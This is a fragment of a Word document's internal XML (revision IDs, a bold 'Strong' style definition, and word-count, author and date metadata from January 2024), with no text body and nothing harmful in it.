    <w:rsid w:val="7F0D3AEF"/>
    <w:rsid w:val="7F620FC1"/>
    <w:rsid w:val="7F71530C"/>
    <w:rsid w:val="7F803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Strong"/>
    <w:basedOn w:val="4"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>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1140</Words>
  <Characters>1837</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>4</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>1868</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2024-01-09T12:30:00Z</dcterms:created>
  <dc:creator>0629</dc:creator>
  <cp:lastModifiedBy>【】</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-01-12T13:28:35Z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D69299A23C4F4723A8454FFD5868BD68</vt:lpwstr>
  </property>
</Properties>
</file>